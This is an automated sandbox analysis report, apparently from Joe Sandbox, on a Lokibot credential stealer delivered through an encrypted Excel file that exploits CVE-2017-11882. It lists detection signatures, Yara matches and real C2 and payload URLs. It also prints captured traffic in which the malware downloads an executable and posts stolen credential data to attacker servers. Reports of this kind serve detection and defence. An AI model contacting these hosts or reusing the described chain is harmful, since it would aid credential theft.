Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Sample Name: MV FORTUNE TRADER.xlsx
Analysis ID: 353332
MD5: b9d2e20a706f5dccd80cbfca09685732
SHA1: b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256: 132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
Tags: VelvetSweatshop, xlsx

Most interesting Screenshot:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: becharnise.ir Virustotal: Detection: 16%
Source: http://kbfvzoboss.bid/alien/fre.php Virustotal: Detection: 14%
Source: http://alphastand.win/alien/fre.php Virustotal: Detection: 9%
Source: http://alphastand.trade/alien/fre.php Virustotal: Detection: 10%
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe Virustotal: Detection: 9%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403D74 FindFirstFileW, 4_2_00403D74

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.208.180.121:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: http://becharnise.ir/fa13/fre.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 Feb 2021 06:02:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 16 Feb 2021 01:44:33 GMTETag: "41c00-5bb6a3e863566"Accept-Ranges: bytesContent-Length: 269312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.8.238
Source: Joe Sandbox View IP Address: 103.141.138.123
Source: Joe Sandbox View IP Address: 185.208.180.121
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: AMINIDCIR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
Source: global traffic HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ED4 recv, 4_2_00404ED4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf
Source: global traffic HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: unknown HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
Source: vbc.exe String found in binary or memory: http://becharnise.ir/fa13/fre.php
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: 83553F27.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the , , yellow bar above 21 This document is 22 ? protected 3 Once you have e
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 lh\ Auv i r g prL?'tya vu a og u43
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040549C 4_2_0040549C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004029D4 4_2_004029D4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222C24 4_2_00222C24
Source: C:\Users\Public\vbc.exe Code function: 4_2_002256EC 4_2_002256EC
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MV FORTUNE TRADER.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00405B6F appears 42 times
Searches the installation path of Mozilla Firefox
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 4_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR138.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: MV FORTUNE TRADER.xlsx Static file information: File size 2551296 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: MV FORTUNE TRADER.xlsx Initial sample: OLE indicators vbamacros = False
Source: MV FORTUNE TRADER.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Yara detected aPLib compressed binary
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match File source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222D10 push eax; ret 4_2_00222D24
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222D10 push eax; ret 4_2_00222D4C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525BD22 push es; ret 4_2_0525BD24
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525E027 push ebp; ret 4_2_0525E02A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525B463 push eax; ret 4_2_0525B47E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525EA1F push edi; retf 4_2_0525EA20
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525EE79 push E83768D8h; retf 4_2_0525EE7E

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX
Source: MV FORTUNE TRADER.xlsx Stream path 'EncryptedPackage' entropy: 7.99992623739 (max. 8.0)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 948 Thread sleep time: -420000s >= -30000s
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403D74 FindFirstFileW, 4_2_00403D74

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h] 4_2_0040317B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h] 4_2_0022092B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h] 4_2_00220D90
Source: C:\Users\Public\vbc.exe Code function: 4_2_002233CB mov eax, dword ptr fs:[00000030h] 4_2_002233CB
Source: C:\Users\Public\vbc.exe Code function: 4_2_052593E3 push dword ptr fs:[00000030h] 4_2_052593E3
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap, 4_2_00402B7C

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406069 GetUserNameW, 4_2_00406069
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
